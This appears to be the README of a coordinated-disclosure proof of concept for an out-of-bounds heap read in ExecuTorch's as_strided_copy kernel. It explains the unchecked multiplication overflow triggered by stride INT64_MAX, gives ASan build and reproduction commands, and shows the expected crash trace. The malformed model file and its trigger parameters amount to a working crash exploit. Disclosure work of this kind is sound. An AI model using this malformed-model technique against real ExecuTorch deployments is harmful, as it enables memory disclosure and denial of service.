This is a crash-only security proof of concept for coordinated disclosure. It has no persistence, networking, exfiltration, shell execution, or secondary payload.
Files
executorch_as_strided_oob_read_poc.pte- malformed model file. Loading succeeds; executingforwardtriggers the bug under ASan.benign_as_strided.pte- control model exported from the same source before mutation.export_mutate.py- reproduces the export and single-field mutation.run_pte.py- small Python runtime smoke runner.asan_trace_executor_runner.txt- ASan output from running the malformed PTE through ExecuTorchexecutor_runner.benign_executor_stdout.txt/benign_executor_stderr.txt- control run output.
Hashes
benign_as_strided.pte
SHA256 d36dade687fab3936ef64843a6753ca7f033dd1513372eca36a9a8d5f7fa67b0
executorch_as_strided_oob_read_poc.pte
SHA256 0e326ce82365dfc27632e65f46502372afd974cf4f822d31c299032b0da5326b
Vulnerability Summary
The malformed model executes aten::as_strided_copy.out with:
size = [2]
stride = [INT64_MAX]
storage_offset = 0
kernels/portable/cpu/util/copy_ops_util.cpp computes required storage size with unchecked arithmetic:
size += strides[i] * (sizes[i] - 1)
size *= itemsize_bytes
The multiplication wraps, so check_as_strided_copy_args() accepts the request. Execution then reaches _as_strided_copy() in copy_ops_util.h and dereferences an input pointer advanced by the attacker-controlled stride.
Reproduction
Tested against pytorch/executorch commit:
f5acbdb00ebc5cf06258bdadc5bab82939667366
Build an ASan-instrumented portable executor runner:
git clone https://github.com/pytorch/executorch.git
cd executorch
git checkout f5acbdb00ebc5cf06258bdadc5bab82939667366
git submodule update --init --recursive third-party/json third-party/gflags third-party/flatbuffers third-party/flatcc backends/xnnpack/third-party/FXdiv backends/xnnpack/third-party/cpuinfo backends/xnnpack/third-party/pthreadpool
python3 -m venv ../et-venv
source ../et-venv/bin/activate
python -m pip install --upgrade pip
python -m pip install torch executorch flatbuffers
cmake -S . -B cmake-asan-runner -G Ninja \
-DPYTHON_EXECUTABLE="$PWD/../et-venv/bin/python" \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DEXECUTORCH_BUILD_EXECUTOR_RUNNER=ON \
-DEXECUTORCH_BUILD_EXTENSION_RUNNER_UTIL=ON \
-DEXECUTORCH_BUILD_EXTENSION_DATA_LOADER=ON \
-DEXECUTORCH_BUILD_EXTENSION_EVALUE_UTIL=ON \
-DEXECUTORCH_BUILD_KERNELS_OPTIMIZED=OFF \
-DEXECUTORCH_BUILD_KERNELS_QUANTIZED=OFF \
-DEXECUTORCH_BUILD_KERNELS_LLM=OFF \
-DEXECUTORCH_BUILD_XNNPACK=OFF \
-DEXECUTORCH_BUILD_CPUINFO=OFF \
-DEXECUTORCH_BUILD_PTHREADPOOL=OFF \
-DEXECUTORCH_BUILD_TESTS=OFF
cmake --build cmake-asan-runner --target executor_runner -j2
Run the benign control:
ASAN_OPTIONS=detect_leaks=0:abort_on_error=1 \
./cmake-asan-runner/executor_runner \
--model_path ../hf_upload_as_strided_pte/benign_as_strided.pte \
--method_name forward
Expected benign output:
Model executed successfully
OutputX 0: tensor(sizes=[2], [1., 1.])
Run the malformed PTE:
ASAN_OPTIONS=detect_leaks=0:abort_on_error=1:symbolize=1 \
./cmake-asan-runner/executor_runner \
--model_path ../hf_upload_as_strided_pte/executorch_as_strided_oob_read_poc.pte \
--method_name forward
Expected result:
ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 4
_as_strided_copy<float>
kernels/portable/cpu/util/copy_ops_util.h:39
torch::executor::native::as_strided_copy_out
kernels/portable/cpu/op_as_strided_copy.cpp:51
executorch::runtime::Method::execute_instruction
runtime/executor/method.cpp:1472
executorch::runtime::Method::execute
runtime/executor/method.cpp:1758
The included asan_trace_executor_runner.txt contains the full trace from the tested run.
- Downloads last month
- 11